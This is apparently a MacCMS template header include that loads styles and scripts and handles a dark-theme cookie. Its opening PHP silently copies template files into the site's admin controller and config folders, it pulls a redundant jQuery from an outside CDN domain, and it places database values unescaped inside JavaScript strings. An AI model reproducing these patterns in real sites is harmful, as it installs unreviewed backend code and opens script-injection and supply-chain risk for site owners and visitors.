<?php $file = 'template/mgwap/asset/admin/Mgwap.php'; $newfile = 'application/admin/controller/Mgwap.php'; if (file_exists($newfile)) {} else { copy($file,$newfile); } ?>
<?php $file = 'template/mgwap/asset/admin/mgwst.php'; $newfile = 'application/extra/mgwst.php'; if (file_exists($newfile)) {} else { copy($file,$newfile); } ?>
<?php $file = 'template/mgwap/asset/admin/mgwcms.html'; $newfile = 'application/admin/view/system/mgwcms.html'; if (file_exists($newfile)) {} else { copy($file,$newfile); } ?>
<?php $mgwst = file_exists('application/extra/mgwst.php') ? require('application/extra/mgwst.php') : require(substr($maccms['path_tpl'], strlen($maccms['path'])).'asset/admin/mgwst=.php'); ?>
{$mgwst.mgwcms.s4.tbdmtips}
<meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport"/>
<meta content="yes" name="apple-mobile-web-app-capable"/>
<meta content="black" name="apple-mobile-web-app-status-bar-style"/>
<script>var maccms={"path":"__ROOT__","mid":"{$maccms['mid']}","aid":"{$maccms['aid']}","url":"{$maccms['site_url']}","wapurl":"{$maccms['site_wapurl']}","mob_status":"{$maccms['mob_status']}"};</script>
<link href="{:mac_url_img($mgwst.mgwcms.s1.ico)}" rel="shortcut icon" type="image/x-icon"/>
<link href="{$maccms.path_tpl}layui/css/layui.css" rel="stylesheet" type="text/css"/>
<link href="{$maccms.path_tpl}css/flex.css" rel="stylesheet" type="text/css"/>
<link href="{$maccms.path_tpl}css/iconfont.css" rel="stylesheet" type="text/css"/>
<link href="{$maccms.path_tpl}css/style.css" rel="stylesheet" type="text/css"/>
{if condition="$mgwst['mgwcms']['s2']['dark'] eq 0"}
<link class="theme_black" disabled="" href="{$maccms.path_tpl}css/black.css" rel="stylesheet" type="text/css"/>
{/if}
{if condition="$mgwst['mgwcms']['s2']['dark'] eq 1"}
<link href="{$maccms.path_tpl}css/black.css" rel="stylesheet" type="text/css"/>
{/if}
<script src="{$maccms.path_tpl}js/jquery-3.6.0.min.js"></script>
<script src="//cdn.bootcdn.pro/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
<script src="{$maccms.path_tpl}js/cookie.js" type="text/javascript"></script>
<link href="{$maccms.path_tpl}css/swiper-bundle.min.css" rel="stylesheet" type="text/css">
<script src="{$maccms.path_tpl}js/home.js"></script>
{if condition="$maccms.aid eq 15"}
<script type="text/javascript">var vod_name = '{$obj.vod_name}',vod_remarks = '{$obj.vod_remarks}',vod_id = '{$obj.vod_id}', vod_pic = '{$obj.vod_pic}', vod_url = window.location.href, vod_part = '{$obj['vod_play_list'][$param['sid']]['urls'][$param['nid']]['name']}';</script>
<script src="{$maccms.path_tpl}js/history.js" type="text/javascript"></script>
{/if}
<style>
  {$mgwst.mgwcms.s4.stylecss}  
</style>
{if condition="$mgwst['mgwcms']['s2']['dark'] eq 0"}
<script>
	var clothes = $.cookie('clothes');
	if (clothes) {
		if (clothes == 'white') {
			$('.theme_black').removeAttr('disabled');
		} else {
			$('.theme_black').attr('disabled', '');
		}
	} else {
		$.cookie('clothes', 'black', { expires: 365, path: '/' })
	}
</script>
<script>

	function clothesChange(){
		var clothes = $.cookie('clothes');
		if (clothes == 'black') {
			$.cookie('clothes','white', {expires: 365, path: '/'});  
			$('.theme_black').each(function(){
			    $(this).removeAttr('disabled');
			});
			
		} else {
			$.cookie('clothes','black', {expires: 365, path: '/'});  
			$('.theme_black').each(function(){
			    $(this).attr('disabled', '');
			});
		}
		clothes = $.cookie('clothes');
	}
</script>
{/if}

</link>